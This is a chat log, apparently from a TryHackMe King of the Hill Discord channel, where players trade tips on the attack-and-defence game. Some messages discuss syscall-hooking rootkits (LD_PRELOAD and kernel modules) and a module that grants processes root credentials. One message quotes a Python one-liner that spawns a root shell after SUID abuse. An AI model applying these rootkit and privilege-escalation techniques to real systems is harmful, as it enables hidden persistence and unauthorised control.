with eBPF you can detect rootkits, for example the aquasecurity tracee, but you can also hook syscalls with it

There are security solutions on the market that use eBPF

That's interesting I hadn't come across that before

XDR for Linux it also has very good protection against rootkits

No

Extended Berkeley Packet Filter

=

ebpf

Yeah I js googled it

Cool

Some XDR also monitors kprobe events

https://github.com/aquasecurity/tracee

I'll check it out

in a paper I wrote, I also mention eBPF

@fading moat Yeah, got it working. The kernel module, for hooking into the syscalls

Hehe, nice. Did you use ftrace hooks?

Yeah, for now I was following along the post that Matheuz mentioned

Insee

This thing is still ineffective, may I know what all am I missing?
~
https://github.com/profxadke/kothrk

./doit.sh

From what I can see, it's effective in the userland. And IIRC, a static binary won't be needing to load the dynamic symbols from your shared library.

There has been some talk around the Linux Kernel Modules (LKMs) which would run with more privilege in kernel space.

Matheuz and others have worked or are working on something similar for KoTH's king foothold

@north wolf

I was studying the LKMs, and have written a little something for KoTH. Lemme know if you wanna test yours against it, it's pretty barebone atm.

nvm, just tested it. It didn't work with the older kernel on the KoTH machine 😆

You're also intercepting just a few functions, like you only hook open(), but there's also open64(), fopen() and fopen64(). The same goes for your other hooks. And ofcourse a static binary is unaffected by this technique.

GG @timid ore!
my first time doing koth. Cooked 😂

btw kaali, if you see this would love if you can explain your methodology and the tcpwrapper thing :)

Just asking guys, do people have some kind of automation setup, They get king within 10mins, I am not able to crack it wiithin 1 hour😮‍💨🥲

How many boxes are there in all of koth ?

Many people have notes for all the machines knowing how to get in, every machine has multiple ways and yes some people have automation. Ur first Match?

Yes

What machine?

@tacit ridge we can make private games if u wanna learn the machines

that is paid🥲

Only the Host needs to have premium and i have premium 😉

there is also sys_openat 👍 which is used in most new systems

do you mean openat() and openat2()?

there is sys_open and sys_openat and sys_openat2

syscalls or functions in libc?

syscalls

but there are wrapers around them in glibc ofcourse

the openat2 is very new its like 5.6 +

this was about a rootkit that uses ld preload, so then he needs the libc functions

openat + openat2 are indeed libc functions, but they're harder to intercept and do checks on

because it takes a file descriptor to a directory as argument you have to get the file/directory associated with the fd

👍

why are only Wizard or higher lvl people on rn? 🥲

It seems I got really lucky on my first koth there weren't any high level

i have, God, Harry, Master and Hacker against me rn xd

The best way to learn is to surround yourself with people who are further along than you. 😄

the THM rank is different than koth experience. The 0xD-GOD rank means the user completed a certain number of THM rooms that got him to level 13 (max) but this has nothing to do with koth games. If he plays for the firs time, or didn't manage to study the machine you play and find a fast way in, you might win, as you already did, with 49 minutes of king. And Lion machine has the fastest root foothold that can get you king in seconds.
BTW I guess you already know there are websites like F11snipe's koth.guru that you can use to check on your opponents and make an idea of koth experience and how many games he played...

uh no i didnt knew there are websites to check it lol

yeah i know that the level shows like how many rooms but with rooms u also get knowledge

You also get knowledge working as a linux sysadmin, or cybersecurity analyst, but when it comes to this competitive game of attack and defense, the speed is more important than knowledge. It doesn't matter if you know how to exploit a vulnerability if someone else exploited it before you and patched it. It doesn't matter if you got in and patched all the ways you know, if someone else know a different way in, finds a way to privesc, loads his lkm and locks you down...Best way to train IMO is private games, Enumerate, get in, get root, and enumerate more to find fastest way in but also as many alternative ways in.

The is a cool site

I've sent you the links in DM (to avoid being muted for advertisements 🙂 )

Yes it is and thank F11snipe for creating it and making it available for community. I guess it needs to be updated tho because I did't see any game with new released Fireworks koth machine... somehow those games are skipped

Gave +1 Rep to @charred hare (current: #14 - 559)

Ahhh good catch.. I can check into an update for that.

@young bramble Will let you know when it's finished... Also planning on putting together a player profile page with additional metrics like nemesis (who you lose to the most) and nemesis of and a few others

nice 🙂 thanks

Gave +1 Rep to @broken pilot (current: #73 - 88)

lets play a game https://tryhackme.com/games/koth/join/bafd2c6791134b12ce3a1a5c

Gg @light flame i dont wanna do the remount stuff the hole time, imme learn a bit😂

gg

https://tryhackme.com/games/koth/join/14ed623c5f6b2240073f287b

gg

GG

yup im still here

mind if I dm?

yeah sure

i had the same issue on my mac mini which has no antivirus any new configuration of vpn dont work for me but i had an old backup of my files with an old vpn configuration im using its working on both my laptop and my mac mini 👍 idk why i cant use a new vpn configuration 🧐

https://tryhackme.com/games/koth/join/c23e7a5a9a13a6a26a28f536

https://tryhackme.com/games/koth/join/b0b3415ab4900d857d8a1ee7

https://tryhackme.com/games/koth/join/6f52abc7d210a4bfd1fce4e9

https://tryhackme.com/games/koth/join/2e47a9245361eb5e12df1ca0

anyone

https://tryhackme.com/games/koth/join/4f7fd0c55bdf6c66fc6cc854

ur boring @fallen palm have fun gg

That guy was you?

Check DM @sturdy fox

King of the hill channel question

what question?

I am doing a king of the hill challenge now but my vbox seems to be running very slow, and suggestions on how to speed up my response?

virtual box or attackbox from thm?

virtual box

Is the attack box better?

nah virtual box is better, are u already connected with the target or is ur own shell working slow?

i had it sometimes that the target was pretty slow

I am connected , I am doing things like nmap, nikto just to get started, is there something I should do to start faster?

i mean rustscan is way faster than nmap but idk about the other stuff

Thank you that is a start, I will use rustscan in the next challenge.

are you using nmap -A cause that is realy realy slow

I use only min to get the open ports (-Pn -p- T4)

so on a linux machine i put myself as king in the king file but what about windows machines?

c:\king.txt

or c:\Administrator\king.txt

nah, they changed both windows machines' king location to c:\king.txt recently

oh fr? didnt noticed

Anyone here found all 6 flags in fireworks koth.? I found 5 only.

I found 6. How do you know there are only 6 in total ?

Just a random guess as many machines have 6

food, shrek, fortune, panda, offline have 8, hackers have 9, carnage and hogwarts have 7...

Huh

I knew they had 6 💀

I should go more deep then from next time.

👀

oh the right side of the flag submission button there is a flag and i tells you how many flags on the machine are btw

what is the first step in the king of the hill challenge?

Enumeration, portscan probably, looking for open ports and what services are running on them

I got that , then did nikto but still struggling to find flag

@light flame you skinny kidde

lol what happened now

I've no idea, he even send a DM but I've heard nothing after that🤷‍♂️

he just send me some bad words while we playing koth

Lmfao I never noticed that..xD

New way to communicate with the LKM.

Using a trusted procfs entry as a front (like kallsyms), no syscall hooking is taking place and everything looks normal

I also went over the kernel to give arbitrary processes root credentials, while the kernel purposefully doesn't provide such an API

As you can see on the left side of the screen

I hope you guys like my new creation :) code will be open sourced after I clean it up and perhaps add some more features

interesting 👍

Does someone know why you can't set your ruid to 0 if your euid is 0 on carnage? If I run python3 -c 'import os;os.setuid(0);os.system("/bin/bash")', I get a PermissionError.

u probably need sudo perm with python to use these command i guess

No, on all other machines it works, and the idea of this command is to make your ruid 0 after you used an suid binary to get root. If you got root through sudo your ruid is already 0 so in that case this command isn't even needed.

@timber vale how are u in 3 games at once?

i play the first game get king go to the other ones 👍

i thought u only can be in 2 at once lol

So you can only host 2 games at a time but you can join in more than 2 if someone else is hosting the match

ohh okeyyy

how comes😂

U just cloned urself congrats😂

https://tryhackme.com/games/koth/join/84f793f805aa8ad15a8a8f2d

@south pulsar what is this this TestUser8422 wasnt here when the game started so he must have got a link and the only thing he did is just reset
he also never had activity until today 🧐

i dont know who the hell is he

he must have a link the reset needed two persons thats why

i'm not playing this koth match

you saying this egyptian guy sent him the link 😂

to hit reset 😂

maybe , i dont even see the game

i was playing htb now

he prolly added an ult account to reset intentionally 😂

bruhs i have a doubt in koth i can find all flags but i cant make the king time anybody say how can get into it? i need steps not solution

U have to put ur name in king.txt to get king points, in linux machines its in /root

@timber vale dont u get bored?

sure🤣

what

you have proofs ?

show me then

no, but I will be happy if the box isn't randomly reset

ok

https://koth.guru/games?api=sort%3D-started_at%26page%255Bnumber%255D%3D1%26filter%255Bboxed%255D%3Dtrue%26filter%255Bstatus%255D%3Dcomplete%26filter%255Bgameplayers__score__gt%255D%3D0%26filter%255Bsearch%255D%3DTestUser8422

@south pulsar congrats, you reset enough to make me loose😂

you play very well 🤣

😂 i dont just play koth all day i play chess sometimes watch some yt vids finish some thm rooms or do some programming ...

ohoh 👀

naah that's definitely sus

At least he's going soft core mode, not like his friend WildInsect

And he was polite to you

Why does koth always cause this behaviour 💀

Cause its a game, always people like this in games😅

Mhh

https://koth.guru/games?api=sort%3D-started_at%26page%255Bnumber%255D%3D1%26filter%255Bboxed%255D%3Dtrue%26filter%255Bstatus%255D%3Dcomplete%26filter%255Bgameplayers__score__gt%255D%3D0%26filter%255Bsearch%255D%3Diamjadu4321

Brain dead dudes be like that

💀

man, THM should use koth.guru if he wants to get more proof about fake accounts on koth 🤣

btw, great job for create koth.guru @fossil pecan 🙏

Agreed

bro attacking bravosec? damn

bravo is your father ?

relax bro

YUP

@south pulsar has been warned.

idk whats wrong with them

@south pulsar spoke like a true sigma

https://tenor.com/view/sigma-alpha-wolf-alpha-wolf-the-weak-should-quiver-gif-17759401881362908244

How bro felt after that

😂

Can I DM you?